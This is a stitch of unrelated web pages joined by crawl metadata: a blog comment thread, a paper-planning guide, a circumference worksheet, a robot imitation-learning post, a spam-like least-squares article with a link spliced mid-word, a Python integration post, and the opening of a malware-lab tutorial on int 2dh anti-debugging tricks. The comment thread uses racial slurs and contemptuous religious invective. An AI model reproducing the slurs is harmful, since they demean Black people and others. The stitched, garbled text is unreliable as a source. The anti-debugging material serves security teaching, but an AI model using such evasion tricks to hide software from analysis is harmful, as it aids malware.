Adam and Eve attempted to conceal their nakedness in the Garden; vanity of vanity all is vanity. Xtianity has preached the disgrace of sin. Oblivious of the sins committed by the church in all generations. But post Shoah, with the rise of the Jewish State of Israel, Jews will rub the noses of Xtianity into the stink of their sins, like a man house trains a puppy. Xtians now wear the shoes of exile, and measure for measure they can expect no compassion nor mercy by Jews for their sins. They can cry out to JeZeus, but their noise accomplishes nothing. The wait in g’lut and rot. Jews mock them saying: when’s the 2nd coming?!
Let’s learn. Your cherry picked p’sukim\verses sit within the sugia of ח:יט-ט:ו This sugia have previously addressed. Therefore this time around shall bring bracketing precedents from other Books of the T’NaCH. Seeing that notions of messiah have infected your brain, something like rabies, shall make a study of precedents in the Books of Shmuel, to first bracket your diseased mind, and then thereafter fire for effect.
Mitzvot learn from other mitzvot. This basic rule which defines all T’NaCH and Talmudic literature, it specifically defines the mitzvah of Moshiach. Which Torah commandment did the prophet Shmuel base his mitzva of Moshiach upon? In 2000+ years of skewed Xtianity, not a single Goy has ever asked this most basic and fundamental question. Fear of Heaven derides and mocks all Xtian theology, creeds, dogma, and doctrines. Moshe the prophet commands a simple commandment: do not add or subtract from any of the commandments which the greatest of all prophets commands.
The believers have not done their homework, not in 2000+ years. What a complete and total disgrace. שמואל א יז:לו David’s confidence that עמלו אל that HaShem guided his path walk, irregardless of lions and bears, that in this conflict with the Philistine giant, that here too he would prevail. Contrast this one verse sugia with your sugia where the Yatzir Ha’Rah entices people to place their trust in witches and necromancers. King Shaul, the rejected Moshiach, consorted with a necromancer witch on the day that he died in battle.
Now shall bracket your sugia by slightly over shooting the mark. שמוא א ל:א-ו. Confronted by disaster, David maintains his cool and confidence that HaShem guides the walk of his destiny. Now — Fire for Effect: BOOM! שמואל א כט:ו-יא Whether and whom ever David served, he served both friend or foe with integrity. This precise precedent understands the k’vanna of your cherry picked p’sukim – Isa 8:21-22.
J’aimeAimé par 1 personne
Stars (cough) fade…. Deuteronomy…messiahs bite dust…. eschatology… what’s beautiful picture for these words?
J’aimeAimé par 1 personne
Original research which views both T’NaCH and Talmud as common law codifications.
Recall my absolute shock, during the opening days of formally learning Torah @ the Chabad Yeshiva in Har Nof Jerusalem. The Rosh Yeshiva, rabbi Kaplan, introduced the Mishna as a Common Law Case\Rule/ legal system. No rabbi before or sense ever made such a definitive understanding of the Mishna. Did this Common law legal system equally apply to the T’NaCH? My research argues most definitely YES.
Since moving to Israel in 1991, have made efforts to do t’shuvah. T’shuvah shares no common ground with the Xtian Anathema known as repentence. T’shuvah addresses the plague of Jewish assimilation to foreign cultures and customs practiced by peoples and societies who never accepted the revelation of the Torah @ Sinai and Horev. Assimilation represents the bane of g’lut Jewry’s existence throughout our 2000+ years in accursed g’lut. Stateless Jewish refugee populations scattered in tiny enclave population centers dispersed across the Middle Eastern Sephardi black communities and Ashkenazic white European communities. All Jews throughout history have struggled with doing t’shuvah in the face of assimilation.
Jewish assimilation defined as: Jews who abandon our Cohen identities, and embrace the cultures and customs of alien peoples; comparable to the black folk, former slaves, who embrace the Xtian religion of their slave owning masters. As an Israeli have made allot of racial humor which lampoons black assimilation to their white over lords. Religious Jews in Israel refer to themselves as “Black”. My humor, which attempts to compare religious haredi Jews to ‘niggers’, alas few of my peers make the jump whereby my humor mocks my own people.
Most people who hear my racial jokes never make the משל\נמשל דיוקים. They take a טפש פשט literal understanding of my racial slurs. They assume that racist jokes refer to black folk in America rather than the butt of religious Haredi Jews in Israel. Something like the missionizers in Tulsa Oklahoma, did not know how to respond when this lost Jew boy, as they viewed me, informed them that i considered myself as a heathen atheist praise G-d. Religion, whether practiced by Goyim or Jews, tends to assume a view of itself as much to praiseworthy.
Religion, all religion, merits taking its “holiness & perfection” with a large amount of salt. Most religious Jews whom have encountered in Israel, they remind me of a dog who continually chases after its tail; a silly hamster who runs itself half to death on a treadmill. Most religious Yidden simply adore religious rhetoric and propaganda. Something like the Fascists of Nazi Germany loved their pomp parades and nigh time rallies.
They love the ribbons and bells and never ever attempt to explore, much less so, understand the substance and purpose behind the ritual pageantry. Nothing more galled me in my youth, when I visited the homes of my black mamma maids and their they displayed their Xtian religious relics. My black mamma maids lived on the other side of the tracks! In the early 1960s Jim Crow laws still prevailed in Midland Texas. It equally infuriated me whenever my mother would consider herself “above” blacks, her social inferiors.
From an early age, tended to associate religion and racism as two peas in the same pod. Have never felt a comfort or at ease when around religion. When ever Religious Mass movements come together – Power rather than morality defines their purpose. Religious power, compares to Socrates forced to drink a cup of poison hemlock. Sooner trust that a snake would not bite me if i stepped on it, than trust the power of religion not to convert me into becoming arrogant. Very much feel at home with secular society. Herein explains the burr under my saddle in matters of doing t’shuvah!
How does a Yid divorce T’NaCH and Talmud from Frumkeit? The Haredi Yidden behave much like as did my mother’s behavior toward blacks. Secular society, poor nebekals – “broken children”! [Hebrew employs such quaint terms for social contempt. Nebek, pathetic social inferiors who merit nothing but extreme pity; תינוק שנשבר: (literally: a Jewish child captured and raised by Goyim)].
As if the children of Haredi Yidden families, don’t struggle with assimilation just as much or more, than do secular Yidden families! Religion spews a poison of “I am Saved” arrogant social superiority. Expressed through the different kippa head coverings. G-d forbid that a person who dons a Kippah sruga, (knitted kippa), should ever disgrace himself, even on Purim, by wearing a black haredi kippa!
Immediately noticed, from day one in Yeshiva, that religious commentaries on the Talmud and T’NaCH, they did not lampoon and criticize religious Jewry. Religious Jewry their shit doesn’t also stink? Disputes defines all the commentaries ever written. Yet, despite these bitter disputes, no rabbinic authority ever criticized Jewish religious practices as wrong! This fundamental and basic flaw in the study of the pursuit of religious commentaries, pilpulism, this glaring flaw caused me to first reject the Reshonim commentaries upon the T’NaCH and Talmud. What happened to the priority of Mussar during the Middle Ages? The ‘Golden Age’ of Spain witnessed a total rabbinic assimilation to the rediscovered ancient Greek philosophers!
The silence, the total lack of denunciation for the betrayal of rabbinic authorities, their public assimilation to despised ancient Greek cultures and customs … what Jews light the lights of Chanukah … only for the lights themselves! This realization, that’s when I started mocking “black” Haredi Jews by lampooning the niggers of America! It never ceased to amaze me that religious Yidden failed to hop that my racial jokes mocked religious Haredi Jews, and not the black people of American society! Haredi Yidden just could not get past the racial ribbons and bells to grasp that my harsh criticism, it directed denounced their religions of rabbinic assimilation.
Assimilation — the first face of avodah zarah. A direct violation of the 2nd Commandment of Sinai. Two key figures define this avodah zarah: (1) King Shlomo’s construction of the 1st Temple; (2) The Rambam’s halachic perversion of Rabbi Akiva’s פרדס explanation of the revelation of the Oral Torah @ Horev. This line of research delves into a highly complex and difficult realm of scholarship. For example, never in 2000+ years has any Xtian “scholar” realized that the Hebrew T’NaCH functions as the first common law codification. The Reshonim scholarship likewise crashed on this reef of T’NaCH common law!
As a T’NaCH\Talmud researcher, seek to view both T’NaCH and Talmudic subjects from a completely different perspective. Have presented arguments which denounce both king Shlomo’s decision to build the Temple and the Rambam’s halachic codification, as both ruinous and an absolute disaster for all generations of Jewry that came thereafter. Herein explains in a new way the classic Hebrew concept of ירידות הדורות. A theological idea that promotes that later generations lack the mental capabilities possessed by earlier generations. This rabbinic dogmatism has plagued my people for a very long time. How to refute and negate this long standing dogma held near and dear among my rabbinic peers?
Decisions taken by a great leader, they produce, so to speak, a domino effect. Once Shlomo built the Temple, no one ever challenged thereafter the validity of this decision. None of the kings who came after Shlomo, nor the prophets, etc. The construction of the Temple, rather than the priority to establish a Federal Sanhedrin court system, suddenly switched immediately thereafter the ‘Golden Ideal’ goal posts. All kings thereafter viewed the grand images of the Temple as the golden ideal. צדק צדק תדוף became just a back water eddy.
But what if king Shlomo ignored the council of the prophet NaTan like his son at Sh’Cem did with the elders, who advised king Sh’lomo when he ruled as king? Because no Jewish authority ever asked this question, this resulted in all later generations lacking the mental ability to put the nation back on its original destiny path walk! Israel came out of the bondage of Egypt to rule the oath sworn lands with justice. HaShem did not redeem Israel from oppressive slavery, just for our People to build ornate and spectacular Temples.
The same equally holds true with how the Rambam halachic code redefined the concept of halachah. All generations thereafter, b/c no one challenged the premise which the Rambam code established, no generation thereafter could ever correct the gross error in judgment made by the Rambam. The Rambam code quickly overshadowed the B’hag, Rif, and Rosh, codes which compared halachic precedents to a Case\Rule Mishna. Prophetic mussar, too became just a back water eddy. Aggaditah turned ‘black’; just a poor nigger pariah ‘boy’! It became fit for only quaint woman’s learning; T’NaCH transformed into a history book!
Rabbis in Yeshiva quite often skipped over the Aggadic portions of the Talmud in order to focus upon the Rambam perversion of Talmudic halachah! Yeshiva students became oblivious to the spirit of prophetic mussar – how it breathes life – unto the halachic forms of ritual observances. Students could only see the halachic ritual whistles and bells, what mussar rebuke lay beneath the shiny tinsel, did not interest them in the least. Baali T’shuvah Yeshivot in Jerusalem cranked out massed produced Frumkeit Yidden, all uniformly dressed up in their holier than thou religious uniforms.
Thanks for your detailed reply. Let me get back to you when library permits.
J’aimeAimé par 2 personnes
J’aimeAimé par 1 personne
Thank you for taking the time to read my post. And have a good day.
J’aimeAimé par 1 personne
Okay dear 🥰
J’aimeAimé par 1 personne | <urn:uuid:f27ec2ab-784d-48b7-8130-46d8bb451f64> | CC-MAIN-2023-14 | https://leblogdejayjay.blog/2022/01/31/a-word-un-mot/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943809.22/warc/CC-MAIN-20230322082826-20230322112826-00003.warc.gz | en | 0.899389 | 6,119 | 2.609375 | 3 |
Making a plan for a paper
This is how I think about it. What works for you may be different. Just like orienteering, there are two main steps: finding out where you are and then determining what you need to do next.
Key statements and evidence (i.e., plots and figures)
Each paper is made up of a few key logical statements, supported by evidence. The evidence typically comes in the form of either data or mathematical proof.
Let’s go through the paper from reading ( https://arxiv.org/abs/2009.13556 ) In that exercise we identified some key statements:
- The objective function $O[\Psi] = E[\Psi] + \sum_i^N \lambda_i |S_i|^2$ has the N+1’th excited state as its minimum if $\lambda_i > E_N-E_i$.
- A method optimizing the objective function $O[\Psi]$ enables optimization of orbitals, determinant coefficients, and Jastrow parameters.
- A CASCI-J wave function agrees with full CI for H2, using this method.
- DMC on a CASCI-J wave function, with all parameters optimized agrees with CC3 within around 0.24 eV for benzene. For fixed parameters the difference is 0.35 eV.
Now let’s think about what evidence supports each of those statements:
- There is a proof of this statement in Section II A.
- This is shown in figures showing that the optimized orbitals are lower in energy than not optimized orbitals.
- Figure 3 shows exactly this by plotting energy versus bond length, with color indicating the method used.
- Tables II and III.
To plan your paper, you should try to match up logical statements to evidence in a similar way. Note that if you look at the paper closely, there are more logical statements and more evidence than just the four I’ve listed here. During the writing of the paper, typically we try many versions of statements and evidence pairs before we settle on the final ones. During the course of writing probably on the order of ~100 or so were generated, but we only considered 5-10 at a time.
Understand what you know now
Idea generation: statement/evidence pairs
In this phase, just try to write down statements and evidence that would be required to show the statements. For evidence, usually it comes in the form of a plot. Write down the x- and y-axes of the plot, and what quantities are being plotted. Try to make the statements as atomic as possible; it’s totally ok (and useful) to plot different views of the same data. I think it’s usually best to aim for around 5-10 statement/evidence pairs at a time.
Now look at your statements. Are some of them redundant? Try to figure out the minimal set of statement/evidence pairs that still amount to the same thing logically. Don’t try to combine two statements that are saying different things, but do try to combine statements that are saying the same thing in slightly different ways.
Forming a heirarchy of statements
Now look at your statements. Which are more important than others, and to whom? Think about who might be interested in which statements. You might not be sure about some of them. That’s ok, but it does mean that you may not want to emphasize that particular statement. For example, from above:
- The proof is mainly interesting to method developers.
- That orbital optimization matters for excited states is mainly interesting to people seeking to apply the method to other systems.
Find the key statements
Now we want to figure out what the project is about. Are there any statements contained in your list that you think summarize the work best? Or maybe is there a meta-statement? If you had two sentences to describe the work, what would you say?
Make a plan to finish the paper
Now go through the evidence required for your revised statement list. Making the plan is very simple; just figure out what you need to do to finish the plots and proofs, and make a plan for doing that! | <urn:uuid:7e91d7a6-6163-4fc1-87af-3bb5ea03c362> | CC-MAIN-2023-14 | http://wagner.physics.illinois.edu/resources/planning_a_paper/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948900.50/warc/CC-MAIN-20230328232645-20230329022645-00003.warc.gz | en | 0.932722 | 889 | 2.546875 | 3 |
Circumference and Wheels
Let’s explore how far different wheels roll.
The diameter of a bike wheel is 27 inches. If the wheel makes 15 complete rotations, how far does the bike travel?
The wheels on Kiran's bike are 64 inches in circumference. How many times do the wheels rotate if Kiran rides 300 yards?
The numbers are measurements of radius, diameter, and circumference of circles A and B. Circle A is smaller than circle B. Which number belongs to which quantity?
2.5, 5, 7.6, 15.2, 15.7, 47.7
Circle A has circumference \(2\frac23\) m. Circle B has a diameter that is \(1\frac12\) times as long as Circle A’s diameter. What is the circumference of Circle B?
The length of segment \(AE\) is 5 centimeters.
- What is the length of segment \(CD\)?
- What is the length of segment \(AB\)?
- Name a segment that has the same length as segment \(AB\). | <urn:uuid:4581b866-4d4d-47b6-9442-e576dc2ac219> | CC-MAIN-2023-14 | https://im.kendallhunt.com/MS/students/2/3/5/practice.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00203.warc.gz | en | 0.875072 | 244 | 2.921875 | 3 |
By Tianhe Yu and Chelsea Finn
Learning a new skill by observing another individual, the ability to imitate, is a key part of intelligence in human and animals. Can we enable a robot to do the same, learning to manipulate a new object by simply watching a human manipulating the object just as in the video below?
The robot learns to place the peach into the red bowl after watching the human do so.
Such a capability would make it dramatically easier for us to communicate new goals to robots – we could simply show robots what we want them to do, rather than teleoperating the robot or engineering a reward function (an approach that is difficult as it requires a full-fledged perception system). Many prior works have investigated how well a robot can learn from an expert of its own kind (i.e. through teleoperation or kinesthetic teaching), which is usually called imitation learning. However, imitation learning of vision-based skills usually requires a huge number of demonstrations of an expert performing a skill. For example, a task like reaching toward a single fixed object using raw pixel input requires 200 demonstrations to achieve good performance according to this prior work. Hence a robot will struggle if there’s only one demonstration presented.
Moreover, the problem becomes even more challenging when the robot needs to imitate a human showing a certain manipulation skill. First, the robot arm looks significantly different from the human arm. Second, engineering the right correspondence between human demonstrations and robot demonstrations is unfortunately extremely difficult. It’s not enough simple to track and remap the motion: the task depends much more critically on how this motion affects objects in the world, and we need a correspondence that is centrally based on the interaction.
To enable the robot to imitate skills from one video of a human, we can allow it to incorporate prior experience, rather than learn each skill completely from scratch. By incorporating prior experience, the robot should also be able to quickly learn to manipulate new objects while being invariant to shifts in domain, such as a person providing a demonstration, a varying background scene, or different viewpoint. We aim to achieve both of these abilities, few-shot imitation and domain invariance, by learning to learn from demonstration data. The technique, also called meta-learning and discussed in this previous blog post, is the key to how we equip robots with the ability to imitate by observing a human.
So how can we use meta-learning to make a robot quickly adapt to many different objects? Our approach is to combine meta-learning with imitation learning to enable one-shot imitation learning. The core idea is that provided a single demonstration of a particular task, i.e. maneuvering a certain object, the robot can quickly identify what the task is and successfully solve it under different circumstances. A prior work on one-shot imitation learning achieves impressive results on simulated tasks such as block-stacking by learning to learn across tens of thousands of demonstrations. If we want a physical robot to able to emulate humans and manipulate a variety of novel objects, we need to develop a new system that can learn to learn from demonstrations in the form of videos using a dataset that can be practically collected in the real world. First, we’ll discuss our approach for visual imitation of a single demonstration collected via teleoperation. Then, we’ll show how it can be extended for learning from videos of humans.
In order to make robots able to learn from watching videos, we combine imitation learning with an efficient meta-learning algorithm, model-agnostic meta-learning (MAML). This previous blog post gives a nice overview of the MAML algorithm. In this approach, we use a standard convolutional neural network with parameters $\theta$ as our policy representation, mapping from an image $o_t$ from the robot’s camera and the robot configuration $x_t$ (e.g. joint angles and joint velocities) to robot actions $a_t$ (e.g. the linear and angular velocity of the gripper) at time step $t$.
There are three main steps in this algorithm.
Three steps for our meta-learning algorithm.
First, we collected a large dataset containing demonstrations of a teleoperated robot performing many different tasks, which in our case, corresponds to manipulating different objects. During the second step, we use MAML to learn an initial set of policy parameters $\theta$, such that, after being provided a demonstration for a certain object, we can run gradient descent with respect to the demonstration to find a generalizable policy with parameters $\theta’$ for that object. When using teleoperated demonstrations, the policy updates can be computed by comparing the policy’s predicted action $\pi_\theta(o_t)$ to the expert action :
Then, we optimize for the initial parameters $\theta$ by driving the updated policy to match the actions from another demonstration with the same object. After meta-training, we can ask the robot to manipulate completely unseen objects by computing gradient steps using a single demonstration of that task. This step is called meta-testing.
As the method does not introduce any additional parameters for meta-learning and optimization, it turns out to be quite data-efficient. Hence it can perform various control tasks such as pushing and placing by just watching a teleoperated robot demonstration:
Placing items into novel containers using a single demonstration. Left: demo. Right: learned policy.
The above method still relies on demonstrations coming from a teleoperated robot rather than a human. To this end, we designed a domain-adaptive one-shot imitation approach building on the above algorithm. We collected demonstrations of many different tasks performed by both teleoperated robots and humans. Then, we provide the human demonstration for computing the policy update and evaluate the updated policy using a robot demonstration performing the same task. A diagram illustrating this algorithm is below:
Overview of domain-adaptive meta-learning.
Unfortunately, as a human demonstration is just a video of a human performing the task, which doesn’t contain the expert actions , we can’t calculate the policy update defined above. Instead, we propose to learn a loss function for updating the policy, a loss function that doesn’t require action labels. The intuition behind learning a loss function is that we can acquire a function that only uses the available inputs, the unlabeled video, while still producing gradients that are suitable for updating the policy parameters in a way that produces a successful policy. While this might seem like an impossible task, it is important to remember that the meta-training process still supervises the policy with true robot actions after the gradient step. The role of the learned loss therefore may be interpreted as simply directing the parameter update to modify the policy to pick up on the right visual cues in the scene, so that the meta-trained action output will produce the right actions. We represent the learned loss function using temporal convolutions, which can extract temporal information in the video demonstration:
We refer to this method as domain-adaptive meta-learning algorithm, as it learns from data (e.g. videos of humans) from a different domain as the domain that the robot’s policy operates in. Our method enables a PR2 robot to effectively learn to push many different objects that are unseen during meta-training toward target positions:
Learning to push a novel object by watching a human.
and pick up many objects and place them onto target containers by watching a human manipulates each object:
Learning to pick up a novel object and place it into a previously unseen bowl.
We also evaluated the method using human demonstrations collected in a different room with a different camera. The robot still performs these tasks reasonably well:
Learning to push a novel object by watching a human in a different environment from a different viewpoint.
Now that we’ve taught a robot to learn to manipulate new objects by watching a single video (which we also demonstrated at NIPS 2017), a natural next step is to further scale these approaches to the setting where different tasks correspond to entirely distinct motions and objectives, such as using a wide variety of tools or playing a wide variety of sports. By considering significantly more diversity in the underlying distribution of tasks, we hope that these models will be able to achieve broader generalization, allowing robots to quickly develop strategies for new situations. Further, the techniques we developed here are not specific to robotic manipulation or even control. For instance, both imitation learning and meta-learning have been used in the context of language (examples here and here respectively). In language and other sequential decision-making settings, learning to imitate from a few demonstrations is an interesting direction for future work.
We would like to thank Sergey Levine and Pieter Abbeel for valuable feedback when preparing this blog post. This article was initially published on the BAIR blog, and appears here with the authors’ permission.
This post is based on the following papers:
One-Shot Visual Imitation Learning via Meta-Learning
Finn C., Yu T., Zhang T., Abbeel P., Levine S. CoRL 2017
paper, code, videos
One-Shot Imitation from Observing Humans via Domain-Adaptive Meta-Learning
Yu T., Finn C., Xie A., Dasari S., Zhang T., Abbeel P., Levine S. RSS 2018 | <urn:uuid:1b5f58dc-ce29-4f00-b009-93b922b4b5c1> | CC-MAIN-2023-14 | https://robohub.org/one-shot-imitation-from-watching-videos/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00203.warc.gz | en | 0.910243 | 1,919 | 3.34375 | 3 |
The graph shows that the regression line is the line that covers the maximum of the points. The least-squares method is usually credited to Carl Friedrich Gauss , but it was first published by Adrien-Marie Legendre . Numerical smoothing and differentiation — this is an application of polynomial fitting.
The number of hours students studied and their exam results are recorded in the table below. Luckily, there is a straightforward formula for finding these. In the image below, you can see a ‘line of best fit’ for the data points \(\), \(\), \(\) and \(\). In fact, this can skew the results of the least-squares analysis. There are a few things to consider when determining math tasks. Finally, think about how much time you have to complete the task.
What is ordinary least squares regression analysis?
When calculating least squares regressions by hand, the first step is to find the means of the dependent and independent variables. We do this because of an interesting quirk within linear regression lines – the line will always cross the point where the two means intersect. We can think of this as an anchor point, as we know that the regression line in our test score data will always cross (4.72, 64.45). For nonlinear least squares fitting to a number of unknown parameters, linear least squares fitting may be applied iteratively to a linearized form of the function until convergence is achieved.
Expanded profiling of Remdesivir as a broad-spectrum antiviral and … – Nature.com
Expanded profiling of Remdesivir as a broad-spectrum antiviral and ….
Posted: Thu, 23 Feb 2023 10:37:50 GMT [source]
Here, since we have a computer readout, we can tell that “Ownership” has to be the x-variable. Thus, the x-variable is the number of months of Phanalla phone ownership, and the y-variable is the lifespan in years. Since we have an equation, we can directly pull away the slope, the thing that x is multiplying. Mitchell Tague has taught all levels of undergraduate statistics, among other math and science courses at the high school and college levels, for the past seven years.
Least Squares Linear Regression explanation
The line which has the least sum of squares of errors is the best fit line. Since the least squares line minimizes the squared distances between the line and our points, we can think of this line as the one that best fits our data. This is why the least squares line is also known as the line of best fit.
In regression analysis, dependent variables are illustrated on the vertical y-axis, whereas impartial variables are illustrated on the horizontal x-axis. A first thought for a measure of the goodness of fit of the line to the data would be simply to add the errors at every point, but the example shows that this cannot work well in general. The line does not fit the data perfectly , yet because of cancellation of positive and negative errors the sum of the errors is zero. Instead goodness of fit is measured by the sum of the squares of the errors.
The perhttps://1investing.in/ance rating for a technician with 20 years of experience is estimated to be 92.3. Table \(\PageIndex\) shows the age in years and the retail value in thousands of dollars of a random sample of ten automobiles of the same make and model. We use \(b_0\) and \(b_1\) to represent the point estimates of the parameters \(\beta _0\) and \(\beta _1\).
What is meant by least square method?
The the line which is fitted in least square regression follow a negative trend in the data; students who have higher family incomes tended to have lower gift aid from the university. In a extra general straight line equation, x and y are coordinates, m is the slope, and b is the [y-intercept]. Because this equation describes a line when it comes to its slope and its y-intercept, this equation is known as the slope-intercept type. For this purpose, given the necessary property that the error imply is impartial of the unbiased variables, the distribution of the error term just isn’t an necessary problem in regression evaluation. A quite common model is the straight line model, which is used to test if there is a linear relationship between unbiased and dependent variables. The variables are said to be correlated if a linear relationship exists.
- This analysis could help the investor predict the degree to which the stock’s price would likely rise or fall for any given increase or decrease in the price of gold.
- However, it is more common to explain the strength of a linear t using R2, called R-squared.
- Now we have all the information needed for our equation and are free to slot in values as we see fit.
- In the case of the least squares regression line, however, the line that best fits the data, the sum of the squared errors can be computed directly from the data using the following formula.
Out of all possible lines, the linear regression model comes up with the best fit line with the least sum of squares of error. Slope and Intercept of the best fit line are the model coefficient. Linear Regression is one of the most important algorithms in machine learning. It is the statistical way of measuring the relationship between one or more independent variables vs one dependent variable. Linear regression ends up being a lot more than this, but when you plot a “trend line” in Excel or do either of the methods you’ve mentioned, they’re all the same.
Has been superimposed on the scatter plot for the sample data set. Where k is the linear regression slope and d is the intercept. This is the expression we would like to find for the regression line. Since x describes our data points, we need to find k, and d. To find the least-squares regression line, we first need to find the linear regression equation. When applying the least-squares method you are minimizing the sum S of squared residuals r.
High resolution synthetic residential energy use profiles for the … – Nature.com
High resolution synthetic residential energy use profiles for the ….
Posted: Mon, 06 Feb 2023 08:00:00 GMT [source]
Different lines through the same set of points would give a different set of distances. We want these distances to be as small as we can make them. Since our distances can be either positive or negative, the sum total of all these distances will cancel each other out.
If we assume that there’s some variation in our data, we will disregard the possibility that both of those commonplace deviations is zero. Therefore the sign of the correlation coefficient would be the identical because the signal of the slope of the regression line. In common, straight lines have slopes which are optimistic, negative, or zero.
We are told that we are treating the temperature, in degrees Fahrenheit, as the x-variable. By process of elimination, the boot time of the computer, given in seconds, must be the y-variable. Now let’s look at actually writing up such interpretations for a couple example problems. We’ll look at one example where we are given the equation of a least-squares regression line, and one where we’ll look at a computer printout. But this is a case of extrapolation, just as part was, hence this result is invalid, although not obviously so.
It is also efficient under the assumption that the errors have finite variance and are homoscedastic, meaning that E[εi2|xi] does not depend on i. The existence of such a covariate will generally lead to a correlation between the regressors and the response variable, and hence to an inconsistent estimator of β. The condition of homoscedasticity can fail with either experimental or observational data. If the goal is either inference or predictive modeling, the performance of OLS estimates can be poor if multicollinearity is present, unless the sample size is large.
In Python, there are many different ways to conduct the least square regression. For example, we can use packages as numpy, scipy, statsmodels, sklearn and so on to get a least square solution. Here we will use the above example and introduce you more ways to do it. Slope and intercept are model coefficients or model parameters. Image by AuthorCoefficient of determination or R-squared measures how much variance in y is explained by the model.
Here s x denotes the standard deviation of the x coordinates and s y the standard deviation of the y coordinates of our data. The sign of the correlation coefficient is directly related to the sign of the slope of our least squares line. For categorical predictors with just two levels, the linearity assumption will always be satis ed. However, we must evaluate whether the residuals in each group are approximately normal and have approximately equal variance. As can be seen in Figure 7.17, both of these conditions are reasonably satis ed by the auction data.
Features of the Least Squares Line
However, the blue line passes through four data points, and the distance between the residual points and the blue line is minimal compared to the other two lines. There are a few features that every least squares line possesses. The first item of interest deals with the slope of our line. The slope has a connection to the correlation coefficient of our data.
To achieve this, all of the returns are plotted on a chart. The index returns are then designated as the independent variable, and the stock returns are the dependent variable. The line of best fit provides the analyst with coefficients explaining the level of dependence. Least squares regression is used for predicting a dependent variable given an independent variable using data you have collected. While you could deduce that for any length of time above 5 hours, 100% would be a good prediction, this is beyond the scope of the data and the linear regression model.
Here a mannequin is fitted to provide a prediction rule for application in a similar scenario to which the data used for becoming apply. Here the dependent variables similar to such future utility can be topic to the identical forms of observation error as those within the data used for fitting. It is subsequently logically constant to use the least-squares prediction rule for such knowledge. A data point may consist of a couple of impartial variable.
The slope −2.05 means that for each unit increase in x the average value of this make and model vehicle decreases by about 2.05 units (about $2,050). To learn the meaning of the slope of the least squares regression line. Here you find a comprehensive list of resources to master machine learning and data science. In contrast to a linear problem, a non-linear least-squares problem has no closed solution and is generally solved by iteration. | <urn:uuid:c0366544-5ee0-4cb1-b267-78f572ac6099> | CC-MAIN-2023-14 | http://www.50onred.com/blog/the-line-which-is-fitted-in-least-square/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945242.64/warc/CC-MAIN-20230324020038-20230324050038-00603.warc.gz | en | 0.929958 | 2,288 | 2.984375 | 3 |
On the quad or trapz'd in ChemE heaven
Posted February 02, 2013 at 09:00 AM | categories: integration, python | tags:
Updated February 27, 2013 at 02:53 PM
What is the difference between quad and trapz? The short answer is that quad integrates functions (via a function handle) using numerical quadrature, and trapz performs integration of arrays of data using the trapezoid method.
Let us look at some examples. We consider the example of computing \(\int_0^2 x^3 dx\). the analytical integral is \(1/4 x^4\), so we know the integral evaluates to 16/4 = 4. This will be our benchmark for comparison to the numerical methods.
We use the scipy.integrate.quad command to evaluate this \(\int_0^2 x^3 dx\).
from scipy.integrate import quad ans, err = quad(lambda x: x**3, 0, 2) print ans
you can also define a function for the integrand.
from scipy.integrate import quad def integrand(x): return x**3 ans, err = quad(integrand, 0, 2) print ans
1 Numerical data integration
if we had numerical data like this, we use trapz to integrate it
import numpy as np x = np.array([0, 0.5, 1, 1.5, 2]) y = x**3 i2 = np.trapz(y, x) error = (i2 - 4)/4 print i2, error
Note the integral of these vectors is greater than 4! You can see why here.
import numpy as np import matplotlib.pyplot as plt x = np.array([0, 0.5, 1, 1.5, 2]) y = x**3 x2 = np.linspace(0, 2) y2 = x2**3 plt.plot(x, y, label='5 points') plt.plot(x2, y2, label='50 points') plt.legend() plt.savefig('images/quad-1.png')
The trapezoid method is overestimating the area significantly. With more points, we get much closer to the analytical value.
import numpy as np x2 = np.linspace(0, 2, 100) y2 = x2**3 print np.trapz(y2, x2)
2 Combining numerical data with quad
You might want to combine numerical data with the quad function if you want to perform integrals easily. Let us say you are given this data:
x = [0 0.5 1 1.5 2]; y = [0 0.1250 1.0000 3.3750 8.0000];
and you want to integrate this from x = 0.25 to 1.75. We do not have data in those regions, so some interpolation is going to be needed. Here is one approach.
from scipy.interpolate import interp1d from scipy.integrate import quad import numpy as np x = [0, 0.5, 1, 1.5, 2] y = [0, 0.1250, 1.0000, 3.3750, 8.0000] f = interp1d(x, y) # numerical trapezoid method xfine = np.linspace(0.25, 1.75) yfine = f(xfine) print np.trapz(yfine, xfine) # quadrature with interpolation ans, err = quad(f, 0.25, 1.75) print ans
These approaches are very similar, and both rely on linear interpolation. The second approach is simpler, and uses fewer lines of code.
trapz and quad are functions for getting integrals. Both can be used with numerical data if interpolation is used. The syntax for the quad and trapz function is different in scipy than in Matlab.
Finally, see this post for an example of solving an integral equation using quad and fsolve.
Copyright (C) 2013 by John Kitchin. See the License for information about copying. | <urn:uuid:9dc3c86d-7b2c-49a3-808c-83449e5c349d> | CC-MAIN-2023-14 | https://kitchingroup.cheme.cmu.edu/blog/2013/02/02/On-the-quad-or-trapz-d-in-ChemE-heaven/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948756.99/warc/CC-MAIN-20230328011555-20230328041555-00603.warc.gz | en | 0.742838 | 940 | 3.09375 | 3 |
- Explore the behavior difference of debuggers on int 2dh.
- Debugging and modification of binary executable programs.
- Basic control flow constructs in x86 assembly.
Challenge of the Day:
- Computer Architecture
- Operating Systems
- Operating Systems Security
- Software Engineering
- Find out as many ways as possible to make a program run differently in a debugged environment from a regular execution (using int 2d)?
The behavior of int 2d instructions may be affected by many factors, e.g., the SEH handler installed by the program itself, whether the program is running under a ring 3 debugger, whether the OS is running in the debugged mode, the program logic of the OS exception handler (KiDispatch), the value of registers when int 2d is requested (determining the service that is requested). In the following, we use an experimental approach to explore the possible ways to make a program behave differently when running in a virtual machine and debugged environment.
2. Lab Configuration
In addition the the immunity debugger, we are going to use WinDbg in this tutorial. Before we proceed, we need to configure it properly on the host machine and the guest XP.
If you have not installed the guest VM, please follow the instructions of Tutorial 1
. Pay special attention to Seciton 3.1 (how to set up the serial port of the XP Guest). In the following we assume that the pipe path on the host machine i
and the guest OS
is using COM1
. The installation of WinDbg on the host machine can follow the instructions on MSDN
We need to further configure the XP guest to make it work.
(1) Revision of c:\boot.ini.
This is to set up a second booting option for the debug mode. The file is shown as below, you can modify yours correspondingly. Note that we set COM1 as the debug port.
